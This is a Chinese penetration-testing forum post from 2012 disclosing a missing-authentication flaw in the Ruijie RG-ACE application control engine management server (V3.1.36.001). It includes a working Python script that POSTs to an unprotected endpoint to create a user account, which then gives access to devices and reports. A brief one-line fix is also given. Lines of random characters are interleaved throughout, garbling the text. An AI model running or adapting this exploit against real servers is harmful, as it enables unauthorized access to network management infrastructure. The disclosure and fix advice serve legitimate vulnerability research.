中国网络渗透测试联盟
标题:
锐捷应用控制引擎管理服务器可以增加用户
[打印本页]
作者:
admin
时间:
2012-12-10 10:16
标题:
锐捷应用控制引擎管理服务器可以增加用户
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接
http://www.ruijie.com.cn/service/down-search.aspx
显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
+ ?9 w1 t1 |; B6 T% o4 e* e
$ h/ D/ {! m5 M" l
\7 a) F/ j& l6 f/ k9 B0 ^
测试的具体版本是
/ ?0 J( s: L0 ^/ l( {/ d
产品名称: 锐捷应用控制引擎
5 ]2 V g% Y0 ?6 h/ ] ]
版本号: 3.1.36.001 TC
3 |( C& ^0 P3 Q/ U
编译时间: 201104291730
' m) A: u; X) ]4 I
: C1 j2 L4 k$ j& r
; r) |, D6 U! Q7 [/ ~' S& n
漏洞证明:
* S/ r4 W8 q! @5 k7 `, a- U
* {% |, ]: h. `8 n4 u4 R
/ }% b9 u! _& E! B( T/ T2 k
6 d2 ~4 y+ E( m4 Y R" E6 u, E+ C- V
# O7 f7 [" v- {3 ?9 @! L# V
/ N7 l8 }) T$ R- R2 u4 ?3 j* p
7 J- ~+ `& W4 `
执行脚本
. s8 P8 |9 H8 S& r, M% c& A
#! /usr/bin/env python
& ^) k, R( m& C8 K7 `
#coding=gbk
1 y, x$ A6 Q) S/ v
#RG-ACE管理服务器 V3.1.36.001
! K6 Y3 u. u+ l
import urllib2, urllib,cookielib
3 {& C2 f0 _2 n# j- b9 k6 ^+ e- U
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
, i, R8 f* p# A
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
# F5 y; j" a3 f _' _
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
1 i: m% D' K- T$ q
post=(("event","userManager.doInsertUserInfo"),
' P* w( m' I7 U& |( K5 ^ _
("useractionname","addButtonValue"),
S" u7 x: J$ S7 n) d5 z! N
("useropermanager","userManager"),
! Q; B+ y$ M2 b
("userName","t"), #######账号自己加
3 r6 y: T0 ]( C: o$ g" J
("pwd","aaaaaa"),######密码自己加
0 s: e8 x3 b4 W3 [2 H9 G) z
("trueName","ad"),
( W$ R) h# s- T# T$ ^9 H9 `0 }
("email",""),
" G1 \# p6 l J# C6 S4 G
("mobilePhone",""),
. T. X+ j+ ?; Q. @; A3 e
("officePhone",""),
`$ J( x) z( }" {- Y
("addr",""),
1 S( R+ k4 R+ c3 N0 b# }# ]1 s
("submit","确定"))
8 n* g. c: A# K" K( r/ ]% v) H
urllib2.install_opener(opener)
: Q, ~9 s2 a# A* f0 d! l
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
- W1 Q X; n, z0 C
print "Done"
% M3 |- ]. _1 A) O; ~ [% e7 b
! }) X2 R3 T0 T
登录,连接设备
5 R: ]8 h1 w7 e' A9 C
1 C9 Q( F9 z1 ~3 e3 w& L& X
8 _5 D ?: h9 K7 u4 e
8 P7 ~2 [4 o8 f8 P! _2 N# Q0 Y
9 B# l Y1 M; P! c7 [( p% X* i% t
4 M% m' Y6 i- V# I
默认的管理员admin权限更大点
+ W" t4 Z4 l3 V% i
4 X w5 v- x9 }: X+ B" ^
$ O. I" {8 J1 z H0 x0 e$ F: y
( }1 c% F. Z7 {& v3 O
* j7 ^1 h9 q( c/ D% H* l/ L- X
$ ~6 \7 w) |7 A3 @
修复方案:
$ B/ X$ l9 _% y! w" v5 C4 B
加强对接口的权限验证
6 k3 r2 z' P% \- N: z
. k' O7 K! \9 o c8 D
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2